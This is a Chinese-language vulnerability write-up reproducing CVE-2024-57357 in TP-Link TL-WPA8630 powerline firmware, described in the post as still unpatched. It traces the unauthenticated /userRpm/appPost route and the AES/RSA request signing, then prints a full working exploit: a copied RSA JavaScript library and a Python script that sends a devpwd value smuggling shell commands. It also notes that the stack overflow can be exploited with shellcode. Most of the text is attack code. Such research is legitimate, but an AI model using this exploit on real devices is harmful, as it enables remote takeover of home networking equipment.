CVE-2024-57357 TPLINK TL-WPA8630 RCE

看到群友分析的这个漏洞挺有意思，抽空来复现一下

漏洞描述

TPLINK TL-WPA 8630 TL-WPA8630（US）_V2_2.0.4 Build 20230427 中存在未授权命令执行漏洞，允许远程攻击者通过对devpwd参数控制达到命令执行的效果。

漏洞影响

TPLINK TL-WPA 8630 TL-WPA8630（US）_V2_2.0.4 Build 20230427目前最新版本

环境搭建

使用FirmAE一键启动

root@key:/FirmAE# ./run.sh -d TP-LINK ./firmwares/wpa8630v2_us-up-ver2-0-4-P1-20230427-rel54545-APPLC.bin 
[*] ./firmwares/wpa8630v2_us-up-ver2-0-4-P1-20230427-rel54545-APPLC.bin emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.45.5 (07-Jan-2020)
e2fsck 1.45.5 (07-Jan-2020)
[*] infer network start!!!

[IID] 3
[MODE] debug
[+] Network reachable on 192.168.0.254!
[+] Web service on 192.168.0.254
[+] Run debug!
Creating TAP device tap3_0...
Set 'tap3_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.254 true true .046378566 2.719320175
[*] firmware - wpa8630v2_us-up-ver2-0-4-P1-20230427-rel54545-APPLC
[*] IP - 192.168.0.254
[*] connecting to netcat (192.168.0.254:31337)
[+] netcat connected
------------------------------
|       FirmAE Debugger      |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.0.254...
Connected to 192.168.0.254.
Escape character is '^]'.

/ # 

访问web端，默认密码admin

漏洞分析

根据漏洞描述定位漏洞点，发现不只是有命令执行漏洞，还有一个栈溢出漏洞

EXP

查看文件保护

root@key:/TP-LINK/squashfs-root# checksec --file=usr/bin/httpd 
    Arch:     mips-32-big
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

现在漏洞点找到了，如何触发呢？对漏洞函数进行交叉引用发现调用流程如下：sub_4256CC<-sub_423E8C<-sub_42412C<-sub_424BDC<-sub_42471C<-sub_424A38<-sub_446068<-sub_424A98<-sub_414DC0<-sub_453AA8<-sub_453DC0<-sub_4539C0<-sub_413834<-start

在这里可以看到漏洞触发的路由：

在知道路由后，对请求参数进行分析，首先定位到sub_424A38函数，发现请求的数据中要不存在”operation“键值或”operation“键值前九个字节不为”upgradeFw“

继续跟进sub_42471C函数，发现接收数据长度不会长于2047

通过Bp抓包可以观察到，请求格式符合下面的代码处理

对解密的JSON数据中存在method，并且键值合法（get、set、add、del、do中的一个），JSON数据中还存在powerline

接下来调用sub_424BDC函数，再跟进sub_42412C函数，发现powerline的键值也是一个JSON数据，并且里面包含devicelist

跟进sub_423E8C函数，分析发现method的键值是add会调用sub_4256CC函数

跟进调用sub_4256CC函数，分析发现devicelist键值也是一个JSON数据，并且包含devpwd和devname，由于devpwd的键值可控导致存在栈溢出和命令执行漏洞

综上整个流程大致清楚了

路由：userRpm/appPost
数据：
data = {
        "method": "add",
        "powerline": {
            "devicelist": {
                "devpwd": ";/tmp/aaa|echo k0mor3b1> /tmp/k0mor3b1;",
                "devname": "k0mor3b1"
            }
        }
    }

到这一步只差分析如何构造sign和data的键值了

对web端访问然后登录（输入错误密码）这个过程抓包，发现在访问阶段，加载了疑似和解密有关的js文件：/js/libs/encrypt.js、/js/libs/cryptoJS.min.js和/js/libs/tpEncrypt.js，在登录阶段发送了/login?form=auth请求，响应中有key和seq，接下来访问了/login?form=login，请求data中就包含了加密数据了

综上分析猜测，加密算法与上述中的js文件有关，并且发送/login?form=auth请求可以获取到key做后续请求数据加密

调试JS分析发现调用了AES_CBC_PKcs7加密了data，Sign是采用了RSA，调试发现和普通的RSA算法不同，最后直接调用encrypt.js中的su.encrypt实现RSA加密

data：AES_CBC_PKcs7.encrypt(data)
    var KEY_LEN = 128 / 8;
    var IV_LEN = 16;
    var OPTIONS = {
            mode: CryptoJS.mode.CBC,
            padding: CryptoJS.pad.Pkcs7
    };
    var AES = function() {};
    AES.prototype.genKey = function() {
            var key = (new Date().getTime() + "" + Math.random() * 1000000000).substr(0, KEY_LEN);
            var iv = (new Date().getTime() + "" + Math.random() * 1000000000).substr(0, IV_LEN);
            this.key = key;
            this._keyUtf8 = CryptoJS.enc.Utf8.parse(key);
            this.iv = iv;
            this._ivUtf8 = CryptoJS.enc.Utf8.parse(iv);
            return {
                    key: key,
                    iv: iv
            }
    };
Sign：rsa.encrypt("k=$(key)&i=$(iv)&h=md5(name+pwd)&s=this.seq + dataLen")
    this.hash = $.encrypt.MD5(name + pwd)
    dataLen = encryptedData.length;
    seq = this.seq + dataLen
    var s = this.aesKeyString + "&h=" + this.hash + "&s=" + seq || this.seq
    var sign = "",
    pos = 0;
    while (pos < s.length) {
            sign = sign + this.rsa.encrypt(s.substr(pos, 64));
            pos = pos + 64
    }

综上完整exp代码如下：

var su = {};
su.encrypt = function (val, param, padding, length) {
  var dbits;
  var canary = 244837814094590;
  var j_lm = ((canary & 16777215) == 15715070);
  function BigInteger(a, b, c) {
        if (a != null) {
          if ('number' == typeof a) {
                this.fromNumber(a, b, c)
          } else {
                if (b == null && 'string' != typeof a) {
                  this.fromString(a, 256)
                } else {
                  this.fromString(a, b)
                }
          }
        }
  }
  function nbi() {
        return new BigInteger(null)
  }
  function am1(i, x, w, j, c, n) {
        while (--n >= 0) {
          var v = x * this[i++] + w[j] + c;
          c = Math.floor(v / 67108864);
          w[j++] = v & 67108863
        }
        return c
  }
  function am2(i, x, w, j, c, n) {
        var xl = x & 32767,
        xh = x >> 15;
        while (--n >= 0) {
          var l = this[i] & 32767;
          var h = this[i++] >> 15;
          var m = xh * l + h * xl;
          l = xl * l + ((m & 32767) << 15) + w[j] + (c & 1073741823);
          c = (l >>> 30) + (m >>> 15) + xh * h + (c >>> 30);
          w[j++] = l & 1073741823
        }
        return c
  }
  function am3(i, x, w, j, c, n) {
        var xl = x & 16383,
        xh = x >> 14;
        while (--n >= 0) {
          var l = this[i] & 16383;
          var h = this[i++] >> 14;
          var m = xh * l + h * xl;
          l = xl * l + ((m & 16383) << 14) + w[j] + c;
          c = (l >> 28) + (m >> 14) + xh * h;
          w[j++] = l & 268435455
        }
        return c
  }
  if (j_lm && (navigator.appName == 'Microsoft Internet Explorer')) {
        BigInteger.prototype.am = am2;
        dbits = 30
  } else {
        if (j_lm && (navigator.appName != 'Netscape')) {
          BigInteger.prototype.am = am1;
          dbits = 26
        } else {
          BigInteger.prototype.am = am3;
          dbits = 28
        }
  }
  BigInteger.prototype.DB = dbits;
  BigInteger.prototype.DM = ((1 << dbits) - 1);
  BigInteger.prototype.DV = (1 << dbits);
  var BI_FP = 52;
  BigInteger.prototype.FV = Math.pow(2, BI_FP);
  BigInteger.prototype.F1 = BI_FP - dbits;
  BigInteger.prototype.F2 = 2 * dbits - BI_FP;
  var BI_RM = '0123456789abcdefghijklmnopqrstuvwxyz';
  var BI_RC = new Array();
  var rr,
  vv;
  rr = '0'.charCodeAt(0);
  for (vv = 0; vv <= 9; ++vv) {
        BI_RC[rr++] = vv
  }
  rr = 'a'.charCodeAt(0);
  for (vv = 10; vv < 36; ++vv) {
        BI_RC[rr++] = vv
  }
  rr = 'A'.charCodeAt(0);
  for (vv = 10; vv < 36; ++vv) {
        BI_RC[rr++] = vv
  }
  function int2char(n) {
        return BI_RM.charAt(n)
  }
  function intAt(s, i) {
        var c = BI_RC[s.charCodeAt(i)];
        return (c == null) ? - 1 : c
  }
  function bnpCopyTo(r) {
        for (var i = this.t - 1; i >= 0; --i) {
          r[i] = this[i]
        }
        r.t = this.t;
        r.s = this.s
  }
  function bnpFromInt(x) {
        this.t = 1;
        this.s = (x < 0) ? - 1 : 0;
        if (x > 0) {
          this[0] = x
        } else {
          if (x < - 1) {
                this[0] = x + this.DV
          } else {
                this.t = 0
          }
        }
  }
  function nbv(i) {
        var r = nbi();
        r.fromInt(i);
        return r
  }
  function bnpFromString(s, b) {
        var k;
        if (b == 16) {
          k = 4
        } else {
          if (b == 8) {
                k = 3
          } else {
                if (b == 256) {
                  k = 8
                } else {
                  if (b == 2) {
                        k = 1
                  } else {
                        if (b == 32) {
                          k = 5
                        } else {
                          if (b == 4) {
                                k = 2
                          } else {
                                this.fromRadix(s, b);
                                return
                          }
                        }
                  }
                }
          }
        }
        this.t = 0;
        this.s = 0;
        var i = s.length,
        mi = false,
        sh = 0;
        while (--i >= 0) {
          var x = (k == 8) ? s[i] & 255 : intAt(s, i);
          if (x < 0) {
                if (s.charAt(i) == '-') {
                  mi = true
                }
                continue
          }
          mi = false;
          if (sh == 0) {
                this[this.t++] = x
          } else {
                if (sh + k > this.DB) {
                  this[this.t - 1] |= (x & ((1 << (this.DB - sh)) - 1)) << sh;
                  this[this.t++] = (x >> (this.DB - sh))
                } else {
                  this[this.t - 1] |= x << sh
                }
          }
          sh += k;
          if (sh >= this.DB) {
                sh -= this.DB
          }
        }
        if (k == 8 && (s[0] & 128) != 0) {
          this.s = - 1;
          if (sh > 0) {
                this[this.t - 1] |= ((1 << (this.DB - sh)) - 1) << sh
          }
        }
        this.clamp();
        if (mi) {
          BigInteger.ZERO.subTo(this, this)
        }
  }
  function bnpClamp() {
        var c = this.s & this.DM;
        while (this.t > 0 && this[this.t - 1] == c) {
          --this.t
        }
  }
  function bnToString(b) {
        if (this.s < 0) {
          return '-' + this.negate().toString(b)
        }
        var k;
        if (b == 16) {
          k = 4
        } else {
          if (b == 8) {
                k = 3
          } else {
                if (b == 2) {
                  k = 1
                } else {
                  if (b == 32) {
                        k = 5
                  } else {
                        if (b == 4) {
                          k = 2
                        } else {
                          return this.toRadix(b)
                        }
                  }
                }
          }
        }
        var km = (1 << k) - 1,
        d,
        m = false,
        r = '',
        i = this.t;
        var p = this.DB - (i * this.DB) % k;
        if (i-- > 0) {
          if (p < this.DB && (d = this[i] >> p) > 0) {
                m = true;
                r = int2char(d)
          }
          while (i >= 0) {
                if (p < k) {
                  d = (this[i] & ((1 << p) - 1)) << (k - p);
                  d |= this[--i] >> (p += this.DB - k)
                } else {
                  d = (this[i] >> (p -= k)) & km;
                  if (p <= 0) {
                        p += this.DB;
                        --i
                  }
                }
                if (d > 0) {
                  m = true
                }
                if (m) {
                  r += int2char(d)
                }
          }
        }
        return m ? r : '0'
  }
  function bnNegate() {
        var r = nbi();
        BigInteger.ZERO.subTo(this, r);
        return r
  }
  function bnAbs() {
        return (this.s < 0) ? this.negate() : this
  }
  function bnCompareTo(a) {
        var r = this.s - a.s;
        if (r != 0) {
          return r
        }
        var i = this.t;
        r = i - a.t;
        if (r != 0) {
          return (this.s < 0) ? - r : r
        }
        while (--i >= 0) {
          if ((r = this[i] - a[i]) != 0) {
                return r
          }
        }
        return 0
  }
  function nbits(x) {
        var r = 1,
        t;
        if ((t = x >>> 16) != 0) {
          x = t;
          r += 16
        }
        if ((t = x >> 8) != 0) {
          x = t;
          r += 8
        }
        if ((t = x >> 4) != 0) {
          x = t;
          r += 4
        }
        if ((t = x >> 2) != 0) {
          x = t;
          r += 2
        }
        if ((t = x >> 1) != 0) {
          x = t;
          r += 1
        }
        return r
  }
  function bnBitLength() {
        if (this.t <= 0) {
          return 0
        }
        return this.DB * (this.t - 1) + nbits(this[this.t - 1] ^ (this.s & this.DM))
  }
  function bnpDLShiftTo(n, r) {
        var i;
        for (i = this.t - 1; i >= 0; --i) {
          r[i + n] = this[i]
        }
        for (i = n - 1; i >= 0; --i) {
          r[i] = 0
        }
        r.t = this.t + n;
        r.s = this.s
  }
  function bnpDRShiftTo(n, r) {
        for (var i = n; i < this.t; ++i) {
          r[i - n] = this[i]
        }
        r.t = Math.max(this.t - n, 0);
        r.s = this.s
  }
  function bnpLShiftTo(n, r) {
        var bs = n % this.DB;
        var cbs = this.DB - bs;
        var bm = (1 << cbs) - 1;
        var ds = Math.floor(n / this.DB),
        c = (this.s << bs) & this.DM,
        i;
        for (i = this.t - 1; i >= 0; --i) {
          r[i + ds + 1] = (this[i] >> cbs) | c;
          c = (this[i] & bm) << bs
        }
        for (i = ds - 1; i >= 0; --i) {
          r[i] = 0
        }
        r[ds] = c;
        r.t = this.t + ds + 1;
        r.s = this.s;
        r.clamp()
  }
  function bnpRShiftTo(n, r) {
        r.s = this.s;
        var ds = Math.floor(n / this.DB);
        if (ds >= this.t) {
          r.t = 0;
          return
        }
        var bs = n % this.DB;
        var cbs = this.DB - bs;
        var bm = (1 << bs) - 1;
        r[0] = this[ds] >> bs;
        for (var i = ds + 1; i < this.t; ++i) {
          r[i - ds - 1] |= (this[i] & bm) << cbs;
          r[i - ds] = this[i] >> bs
        }
        if (bs > 0) {
          r[this.t - ds - 1] |= (this.s & bm) << cbs
        }
        r.t = this.t - ds;
        r.clamp()
  }
  function bnpSubTo(a, r) {
        var i = 0,
        c = 0,
        m = Math.min(a.t, this.t);
        while (i < m) {
          c += this[i] - a[i];
          r[i++] = c & this.DM;
          c >>= this.DB
        }
        if (a.t < this.t) {
          c -= a.s;
          while (i < this.t) {
                c += this[i];
                r[i++] = c & this.DM;
                c >>= this.DB
          }
          c += this.s
        } else {
          c += this.s;
          while (i < a.t) {
                c -= a[i];
                r[i++] = c & this.DM;
                c >>= this.DB
          }
          c -= a.s
        }
        r.s = (c < 0) ? - 1 : 0;
        if (c < - 1) {
          r[i++] = this.DV + c
        } else {
          if (c > 0) {
                r[i++] = c
          }
        }
        r.t = i;
        r.clamp()
  }
  function bnpMultiplyTo(a, r) {
        var x = this.abs(),
        y = a.abs();
        var i = x.t;
        r.t = i + y.t;
        while (--i >= 0) {
          r[i] = 0
        }
        for (i = 0; i < y.t; ++i) {
          r[i + x.t] = x.am(0, y[i], r, i, 0, x.t)
        }
        r.s = 0;
        r.clamp();
        if (this.s != a.s) {
          BigInteger.ZERO.subTo(r, r)
        }
  }
  function bnpSquareTo(r) {
        var x = this.abs();
        var i = r.t = 2 * x.t;
        while (--i >= 0) {
          r[i] = 0
        }
        for (i = 0; i < x.t - 1; ++i) {
          var c = x.am(i, x[i], r, 2 * i, 0, 1);
          if ((r[i + x.t] += x.am(i + 1, 2 * x[i], r, 2 * i + 1, c, x.t - i - 1)) >= x.DV) {
                r[i + x.t] -= x.DV;
                r[i + x.t + 1] = 1
          }
        }
        if (r.t > 0) {
          r[r.t - 1] += x.am(i, x[i], r, 2 * i, 0, 1)
        }
        r.s = 0;
        r.clamp()
  }
  function bnpDivRemTo(m, q, r) {
        var pm = m.abs();
        if (pm.t <= 0) {
          return
        }
        var pt = this.abs();
        if (pt.t < pm.t) {
          if (q != null) {
                q.fromInt(0)
          }
          if (r != null) {
                this.copyTo(r)
          }
          return
        }
        if (r == null) {
          r = nbi()
        }
        var y = nbi(),
        ts = this.s,
        ms = m.s;
        var nsh = this.DB - nbits(pm[pm.t - 1]);
        if (nsh > 0) {
          pm.lShiftTo(nsh, y);
          pt.lShiftTo(nsh, r)
        } else {
          pm.copyTo(y);
          pt.copyTo(r)
        }
        var ys = y.t;
        var y0 = y[ys - 1];
        if (y0 == 0) {
          return
        }
        var yt = y0 * (1 << this.F1) + ((ys > 1) ? y[ys - 2] >> this.F2 : 0);
        var d1 = this.FV / yt,
        d2 = (1 << this.F1) / yt,
        e = 1 << this.F2;
        var i = r.t,
        j = i - ys,
        t = (q == null) ? nbi() : q;
        y.dlShiftTo(j, t);
        if (r.compareTo(t) >= 0) {
          r[r.t++] = 1;
          r.subTo(t, r)
        }
        BigInteger.ONE.dlShiftTo(ys, t);
        t.subTo(y, y);
        while (y.t < ys) {
          y[y.t++] = 0
        }
        while (--j >= 0) {
          var qd = (r[--i] == y0) ? this.DM : Math.floor(r[i] * d1 + (r[i - 1] + e) * d2);
          if ((r[i] += y.am(0, qd, r, j, 0, ys)) < qd) {
                y.dlShiftTo(j, t);
                r.subTo(t, r);
                while (r[i] < --qd) {
                  r.subTo(t, r)
                }
          }
        }
        if (q != null) {
          r.drShiftTo(ys, q);
          if (ts != ms) {
                BigInteger.ZERO.subTo(q, q)
          }
        }
        r.t = ys;
        r.clamp();
        if (nsh > 0) {
          r.rShiftTo(nsh, r)
        }
        if (ts < 0) {
          BigInteger.ZERO.subTo(r, r)
        }
  }
  function bnMod(a) {
        var r = nbi();
        this.abs().divRemTo(a, null, r);
        if (this.s < 0 && r.compareTo(BigInteger.ZERO) > 0) {
          a.subTo(r, r)
        }
        return r
  }
  function Classic(m) {
        this.m = m
  }
  function cConvert(x) {
        if (x.s < 0 || x.compareTo(this.m) >= 0) {
          return x.mod(this.m)
        } else {
          return x
        }
  }
  function cRevert(x) {
        return x
  }
  function cReduce(x) {
        x.divRemTo(this.m, null, x)
  }
  function cMulTo(x, y, r) {
        x.multiplyTo(y, r);
        this.reduce(r)
  }
  function cSqrTo(x, r) {
        x.squareTo(r);
        this.reduce(r)
  }
  Classic.prototype.convert = cConvert;
  Classic.prototype.revert = cRevert;
  Classic.prototype.reduce = cReduce;
  Classic.prototype.mulTo = cMulTo;
  Classic.prototype.sqrTo = cSqrTo;
  function bnpInvDigit() {
        if (this.t < 1) {
          return 0
        }
        var x = this[0];
        if ((x & 1) == 0) {
          return 0
        }
        var y = x & 3;
        y = (y * (2 - (x & 15) * y)) & 15;
        y = (y * (2 - (x & 255) * y)) & 255;
        y = (y * (2 - (((x & 65535) * y) & 65535))) & 65535;
        y = (y * (2 - x * y % this.DV)) % this.DV;
        return (y > 0) ? this.DV - y : - y
  }
  function Montgomery(m) {
        this.m = m;
        this.mp = m.invDigit();
        this.mpl = this.mp & 32767;
        this.mph = this.mp >> 15;
        this.um = (1 << (m.DB - 15)) - 1;
        this.mt2 = 2 * m.t
  }
  function montConvert(x) {
        var r = nbi();
        x.abs().dlShiftTo(this.m.t, r);
        r.divRemTo(this.m, null, r);
        if (x.s < 0 && r.compareTo(BigInteger.ZERO) > 0) {
          this.m.subTo(r, r)
        }
        return r
  }
  function montRevert(x) {
        var r = nbi();
        x.copyTo(r);
        this.reduce(r);
        return r
  }
  function montReduce(x) {
        while (x.t <= this.mt2) {
          x[x.t++] = 0
        }
        for (var i = 0; i < this.m.t; ++i) {
          var j = x[i] & 32767;
          var u0 = (j * this.mpl + (((j * this.mph + (x[i] >> 15) * this.mpl) & this.um) << 15)) & x.DM;
          j = i + this.m.t;
          x[j] += this.m.am(0, u0, x, i, 0, this.m.t);
          while (x[j] >= x.DV) {
                x[j] -= x.DV;
                x[++j]++
          }
        }
        x.clamp();
        x.drShiftTo(this.m.t, x);
        if (x.compareTo(this.m) >= 0) {
          x.subTo(this.m, x)
        }
  }
  function montSqrTo(x, r) {
        x.squareTo(r);
        this.reduce(r)
  }
  function montMulTo(x, y, r) {
        x.multiplyTo(y, r);
        this.reduce(r)
  }
  Montgomery.prototype.convert = montConvert;
  Montgomery.prototype.revert = montRevert;
  Montgomery.prototype.reduce = montReduce;
  Montgomery.prototype.mulTo = montMulTo;
  Montgomery.prototype.sqrTo = montSqrTo;
  function bnpIsEven() {
        return ((this.t > 0) ? (this[0] & 1) : this.s) == 0
  }
  function bnpExp(e, z) {
        if (e > 4294967295 || e < 1) {
          return BigInteger.ONE
        }
        var r = nbi(),
        r2 = nbi(),
        g = z.convert(this),
        i = nbits(e) - 1;
        g.copyTo(r);
        while (--i >= 0) {
          z.sqrTo(r, r2);
          if ((e & (1 << i)) > 0) {
                z.mulTo(r2, g, r)
          } else {
                var t = r;
                r = r2;
                r2 = t
          }
        }
        return z.revert(r)
  }
  function bnModPowInt(e, m) {
        var z;
        if (e < 256 || m.isEven()) {
          z = new Classic(m)
        } else {
          z = new Montgomery(m)
        }
        return this.exp(e, z)
  }
  BigInteger.prototype.copyTo = bnpCopyTo;
  BigInteger.prototype.fromInt = bnpFromInt;
  BigInteger.prototype.fromString = bnpFromString;
  BigInteger.prototype.clamp = bnpClamp;
  BigInteger.prototype.dlShiftTo = bnpDLShiftTo;
  BigInteger.prototype.drShiftTo = bnpDRShiftTo;
  BigInteger.prototype.lShiftTo = bnpLShiftTo;
  BigInteger.prototype.rShiftTo = bnpRShiftTo;
  BigInteger.prototype.subTo = bnpSubTo;
  BigInteger.prototype.multiplyTo = bnpMultiplyTo;
  BigInteger.prototype.squareTo = bnpSquareTo;
  BigInteger.prototype.divRemTo = bnpDivRemTo;
  BigInteger.prototype.invDigit = bnpInvDigit;
  BigInteger.prototype.isEven = bnpIsEven;
  BigInteger.prototype.exp = bnpExp;
  BigInteger.prototype.toString = bnToString;
  BigInteger.prototype.negate = bnNegate;
  BigInteger.prototype.abs = bnAbs;
  BigInteger.prototype.compareTo = bnCompareTo;
  BigInteger.prototype.bitLength = bnBitLength;
  BigInteger.prototype.mod = bnMod;
  BigInteger.prototype.modPowInt = bnModPowInt;
  BigInteger.ZERO = nbv(0);
  BigInteger.ONE = nbv(1);
  function Arcfour() {
        this.i = 0;
        this.j = 0;
        this.S = new Array()
  }
  function ARC4init(key) {
        var i,
        j,
        t;
        for (i = 0; i < 256; ++i) {
          this.S[i] = i
        }
        j = 0;
        for (i = 0; i < 256; ++i) {
          j = (j + this.S[i] + key[i % key.length]) & 255;
          t = this.S[i];
          this.S[i] = this.S[j];
          this.S[j] = t
        }
        this.i = 0;
        this.j = 0
  }
  function ARC4next() {
        var t;
        this.i = (this.i + 1) & 255;
        this.j = (this.j + this.S[this.i]) & 255;
        t = this.S[this.i];
        this.S[this.i] = this.S[this.j];
        this.S[this.j] = t;
        return this.S[(t + this.S[this.i]) & 255]
  }
  Arcfour.prototype.init = ARC4init;
  Arcfour.prototype.next = ARC4next;
  function prng_newstate() {
        return new Arcfour()
  }
  var rng_psize = 256;
  var rng_state;
  var rng_pool;
  var rng_pptr;
  function rng_seed_int(x) {
        rng_pool[rng_pptr++] ^= x & 255;
        rng_pool[rng_pptr++] ^= (x >> 8) & 255;
        rng_pool[rng_pptr++] ^= (x >> 16) & 255;
        rng_pool[rng_pptr++] ^= (x >> 24) & 255;
        if (rng_pptr >= rng_psize) {
          rng_pptr -= rng_psize
        }
  }
  function rng_seed_time() {
        rng_seed_int(new Date().getTime())
  }
  if (rng_pool == null) {
        rng_pool = new Array();
        rng_pptr = 0;
        var t;
        if (window.crypto && window.crypto.getRandomValues) {
          var ua = new Uint8Array(32);
          window.crypto.getRandomValues(ua);
          for (t = 0; t < 32; ++t) {
                rng_pool[rng_pptr++] = ua[t]
          }
        }
        if (
          navigator.appName == 'Netscape' &&
          navigator.appVersion < '5' &&
          window.crypto
        ) {
          var z = window.crypto.random(32);
          for (t = 0; t < z.length; ++t) {
                rng_pool[rng_pptr++] = z.charCodeAt(t) & 255
          }
        }
        while (rng_pptr < rng_psize) {
          t = Math.floor(65536 * Math.random());
          rng_pool[rng_pptr++] = t >>> 8;
          rng_pool[rng_pptr++] = t & 255
        }
        rng_pptr = 0;
        rng_seed_time()
  }
  function rng_get_byte() {
        if (rng_state == null) {
          rng_seed_time();
          rng_state = prng_newstate();
          rng_state.init(rng_pool);
          for (rng_pptr = 0; rng_pptr < rng_pool.length; ++rng_pptr) {
                rng_pool[rng_pptr] = 0
          }
          rng_pptr = 0
        }
        return rng_state.next()
  }
  function rng_get_bytes(ba) {
        var i;
        for (i = 0; i < ba.length; ++i) {
          ba[i] = rng_get_byte()
        }
  }
  function SecureRandom() {
  }
  SecureRandom.prototype.nextBytes = rng_get_bytes;
  function parseBigInt(str, r) {
        return new BigInteger(str, r)
  }
  function byte2Hex(b) {
        if (b < 16) {
          return '0' + b.toString(16)
        } else {
          return b.toString(16)
        }
  }
  function pkcs1pad2(s, n) {
        if (n < s.length + 11) {
          alert('Message too long for RSA');
          return null
        }
        var ba = new Array();
        var i = s.length - 1;
        while (i >= 0 && n > 0) {
          var c = s.charCodeAt(i--);
          if (c < 128) {
                ba[--n] = c
          } else {
                if ((c > 127) && (c < 2048)) {
                  ba[--n] = (c & 63) | 128;
                  ba[--n] = (c >> 6) | 192
                } else {
                  ba[--n] = (c & 63) | 128;
                  ba[--n] = ((c >> 6) & 63) | 128;
                  ba[--n] = (c >> 12) | 224
                }
          }
        }
        ba[--n] = 0;
        var rng = new SecureRandom();
        var x = new Array();
        while (n > 2) {
          x[0] = 0;
          while (x[0] == 0) {
                rng.nextBytes(x)
          }
          ba[--n] = x[0]
        }
        ba[--n] = 2;
        ba[--n] = 0;
        return new BigInteger(ba)
  }
  function RSAKey() {
        this.n = null;
        this.e = 0;
        this.d = null;
        this.p = null;
        this.q = null;
        this.dmp1 = null;
        this.dmq1 = null;
        this.coeff = null
  }
  function RSASetPublic(N, E) {
        if (N != null && E != null && N.length > 0 && E.length > 0) {
          this.n = parseBigInt(N, 16);
          this.e = parseInt(E, 16)
        } else {
          alert('Invalid RSA public key')
        }
  }
  function RSADoPublic(x) {
        return x.modPowInt(this.e, this.n)
  }
  function nopadding(s, n) {
        if (n < s.length) {
          alert('Message too long for RSA');
          return null
        }
        var ba = new Array();
        var i = 0;
        var j = 0;
        while (i < s.length && j < n) {
          var c = s.charCodeAt(i++);
          if (c < 128) {
                ba[j++] = c
          } else {
                if ((c > 127) && (c < 2048)) {
                  ba[j++] = (c & 63) | 128;
                  ba[j++] = (c >> 6) | 192
                } else {
                  ba[j++] = (c & 63) | 128;
                  ba[j++] = ((c >> 6) & 63) | 128;
                  ba[j++] = (c >> 12) | 224
                }
          }
        }
        while (j < n) {
          ba[j++] = 0
        }
        return new BigInteger(ba)
  }
  function RSAEncrypt(text) {
        switch (padding) {
          case 0:
                var m = nopadding(text, (this.n.bitLength() + 7) >> 3);
                break;
          case 1:
                var m = pkcs1pad2(text, (this.n.bitLength() + 7) >> 3);
                break;
          default:
                var m = nopadding(text, (this.n.bitLength() + 7) >> 3)
        }
        if (m == null) {
          return null
        }
        var c = this.doPublic(m);
        if (c == null) {
          return null
        }
        var h = c.toString(16);
        if ((h.length & 1) == 0) {
          return h
        } else {
          return '0' + h
        }
  }
  RSAKey.prototype.doPublic = RSADoPublic;
  RSAKey.prototype.setPublic = RSASetPublic;
  RSAKey.prototype.encrypt = RSAEncrypt;
  var rsaObj = new RSAKey();
  var n = param[0];
  var e = param[1];
  rsaObj.setPublic(n, e);
  var result = rsaObj.encrypt(val);
  var length = n.length ||
  256;
  if (result.length != length) {
        var l = Math.abs(length - result.length);
        for (var i = 0; i < l; i++) {
          result = '0' + result
        }
  }
  return result
};
from pwn import log
import requests
import json
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import base64
import execjs

# 读取 js 文件
with open("encrypt.js", "r") as f:
    js_code = f.read()

# 修改 JS 代码，模拟 window 和 navigator 对象
js_code = """
var window = {};  // 模拟 window 对象
var navigator = { appName: 'Netscape' };  // 模拟 navigator 对象
""" + js_code  # 将模拟的 window 和 navigator 加入到原始 JS 代码之前

# 编译 JavaScript 代码
ctx = execjs.compile(js_code)

def aes_encrypt(data: str) -> str:
    key = "1723629509063863".encode('utf-8')
    iv = "1723629509063183".encode('utf-8')
    cipher = AES.new(key, AES.MODE_CBC, iv)
    padded_data = pad(data.encode('utf-8'), AES.block_size)
    ciphertext = cipher.encrypt(padded_data)
    return base64.b64encode(ciphertext).decode('utf-8')

if __name__ == "__main__":
    get_nn_url = "http://192.168.0.254/login?form=auth"
    headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": "http://192.168.0.254",
        "Referer": "http://192.168.0.254/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "Authorization=",
        "Connection": "close"
    }

    # 获取RSA参数
    response = requests.post(get_nn_url, headers=headers, data={"operation": "read"})
    if response.status_code != 200:
        log.error("Failed to get RSA parameters")
        sys.exit(1)

    json_data = response.json()
    NN = json_data['data']['key'][0]
    EE = json_data['data']['key'][1]
    seq = int(json_data['data']['seq'])  # 转换为整数

    log.success(f"RSA nn ==> {NN}")
    log.success(f"RSA EE ==> {EE}")
    log.success(f"seq   ==> {seq}")

    key = "1723629509063863"
    iv = "1723629509063183"
    # 构造加密数据
    data = {
        "method": "add",
        "powerline": {
            "devicelist": {
                "devpwd": ";/tmp/aaa|echo 123456 > /tmp/k0mor3b1;",
                "devname": "k0mor3b1"
            }
        }
    }
    aes_data = aes_encrypt(json.dumps(data))  # 序列化为JSON
    seq_len = seq + len(aes_data)
    sign = f"k={key}&i={iv}&h=4d5a4a44a47930bab235591d76e8e5c0&s={seq_len}"
    log.success(f"payload ==> {sign}")
    param = [
        "A242AA9D956E46BB6A1F5BA69D82089CE913DBE5479BFA437EE0A9887794E20FC7D3AC2595AA4A2681F5F77E87CDCEF1436E9D93C5D7FB0C9D151B97F7C11A9F",
        "010001"
    ]
    padding = 0
    length = 128

    rsa_sign = ""
    chunk_size = 64
    for i in range(0, len(sign), chunk_size):
        rsa_sign += ctx.call("su.encrypt", sign[i:i + chunk_size], param, padding, length)

    payload = {"data": aes_data, "sign": rsa_sign}
    payload = json.dumps(payload)
    log.success(f"payload ==> {payload}")

    # 发送请求
    url = "http://192.168.0.254/userRpm/appPost"
    response = requests.post(url, headers=headers, data=payload)
    print(response.status_code)
    print(response.text)

最后，栈溢出漏洞由于没有开NX保护，直接打shellcode就可以

补丁分析

目前漏洞修复的固件暂未公开

参考链接

固件下载：https://www.tp-link.com/us/support/download/tl-wpa8630-kit/#Firmware

c10uds/tplink-wpa8630-rce-vulnerability: A pre-authentication RCE vulnerability and attack script for a TP-Link TL-WPA8630 device